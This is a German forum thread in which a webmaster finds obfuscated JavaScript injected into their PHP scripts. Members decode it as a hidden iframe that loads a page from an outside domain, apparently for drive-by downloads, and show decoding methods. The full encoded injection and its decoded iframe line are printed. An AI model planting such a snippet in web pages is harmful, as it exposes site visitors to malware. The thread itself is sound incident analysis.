Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Was bedeutet das bzw. was kann ich bei sowas lesbar machen

Frage Entwicklung JavaScript

Mitglied: 35801

35801 (Level 1)

08.04.2009, aktualisiert 13.05.2009, 4767 Aufrufe, 9 Kommentare

Ich habe ein einer meiner PHP Scripte folgendes gefunden...
01.
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
Scheinbar eine hinterlassenschaft eines netten Menschen, der sich illegal zu meinem Webspace Zugang verschafft hat... Wie kann ich sowas wieder leesbar machen bzw. herausfinden was das eigentlich tut?
Mitglied: Woolfsmann
08.04.2009 um 14:08 Uhr
Hi,

nach einer kurzen google suche komm denke ich das hier hilft dir.

http://www.heise.de/security/Schaedlingen-auf-der-Spur--/artikel/49687

gruß
Woolfsmann
Bitte warten ..
Mitglied: 35801
08.04.2009 um 14:15 Uhr
Danke... Hab mal in den Artikel reingesehen... aber wie und womit DECODIERT man das ??

Ich müsste wissen was das macht.
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 14:41 Uhr
Hi,

Ich müsste wissen was das macht.
das script fuegt einen unsichtbaren iframe auf Deiner Seite ein:
01.
<iframe src="http://.../in.php" width=0 height=0 style='display:none'></iframe>
Und der versucht dann sicher einen trojaner per drive-by download auszuliefern.

lg,
Slainte
Bitte warten ..
Mitglied: 35801
08.04.2009 um 15:54 Uhr
OK Danke!

Aber wie hast du das decodiert?

Ich suche nach einer Möglichkeit das selber zu decodieren, weil ich an einigen Stellen sowas gefunden habe...
Bitte warten ..
Mitglied: miniversum
08.04.2009 um 16:09 Uhr
Das ist leicht zu "decodieren". Du schnapst dir eine ASCII-Tabelle und los gehts.
\u003c
bedeutet z.B. für den Hexwert 0x3C. Schaust du den in einer ASCII Tabelle nach erhällst du dafür das Zeichen "<".
So machst du das dann mit allen Werten. Das kannst du auch per Suchen und ersetzen machen.
Die ersten paar Werte
\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063
ergeben somit
<iframe src=

miniversum
Bitte warten ..
Mitglied: SlainteMhath
08.04.2009 um 16:11 Uhr
oder Du ersetzt das "document.write" einfach durch ein "alert"
Bitte warten ..
Mitglied: Biber
08.04.2009 um 16:17 Uhr
Moin diaz1983,

diese Form der Zeichendarstellung ist eigentlich nur die javatypische Schreibweise als Unicode-Character.

Wenn Du eine handelsübliche Übersetzungstabelle zur Hand nimmt (siehe bei wikipedia oder diese hier, dann kannst relativ fileßend lesen:

\u003c <
\u0069 i
\u0066 f
\u0072 r
\u0061 a
\u006d m
\u0065 e
\u0020
\u0020
\u0073 s
\u0072 r
\u0063 c
.... wie SlainteMhath schon vorgeturnt hat.

Grüße
Biber
[Edit] uppps... zu langsam... [/Edit]
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:18 Uhr
Hab noch ne nette Methode gefunden...

Zumindest mit Python ging das ganz einfach auf meinem Fedora-System

01.
[peter@fedoraPC ~]# python 
02.
Python 2.5.2 (r252:60911, Sep 30 2008, 15:41:38)  
03.
[GCC 4.3.2 20080917 (Red Hat 4.3.2-4)] on linux2 
04.
Type "help", "copyright", "credits" or "license" for more information. 
05.
 
06.
>>> print u"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0020\u0073\u0072\u0063\u003d\u0027\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006d\u0075\u0073\u0069\u0063\u0032\u0034\u0073\u0068\u006f\u0070\u002e\u006e\u0065\u0074\u002f\u0032\u002f\u0069\u006e\u002e\u0070\u0068\u0070\u0027\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0027\u0030\u0027\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0027\u0030\u0027\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0027\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0027\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e" 
07.
<iframe  src='http://music24shop.net/2/in.php' width='0' height='0' style='display:none'></iframe>
Bitte warten ..
Mitglied: 35801
08.04.2009 um 16:21 Uhr
OK Danke...

Hab nur ein paar passagen, die etwas länger (5-6 mal so lang) sind und darum wollt ich die "zu Fuß - Methode" vermeiden...
Bitte warten ..
Ähnliche Inhalte
Neue Wissensbeiträge
Batch & Shell

Batch als Dienst bei Systemstart ohne Anmeldung ausführen

(4)

Tipp von tralveller zum Thema Batch & Shell ...

Sicherheits-Tools

Sicherheitstest von Passwörtern für ganze DB-Tabellen

(1)

Tipp von gdconsult zum Thema Sicherheits-Tools ...

Peripheriegeräte

Was beachten bei der Wahl einer USV Anlage im Serverschrank

(9)

Tipp von zetboxit zum Thema Peripheriegeräte ...

Heiß diskutierte Inhalte
Exchange Server
Exchange 2016 Standard Server 2012 R2 Hetzner Mail (41)

Frage von Datsspeed zum Thema Exchange Server ...

Windows 7
gelöst Lokales Adminprofil defekt (25)

Frage von Yannosch zum Thema Windows 7 ...

LAN, WAN, Wireless
gelöst Statische Routen mit ISC-DHCP Server für Android Devices (18)

Frage von terminator zum Thema LAN, WAN, Wireless ...

Exchange Server
gelöst Migration Exchange 2007 zu 2013 - Public Folder teilweise weg (16)

Frage von Andy1987 zum Thema Exchange Server ...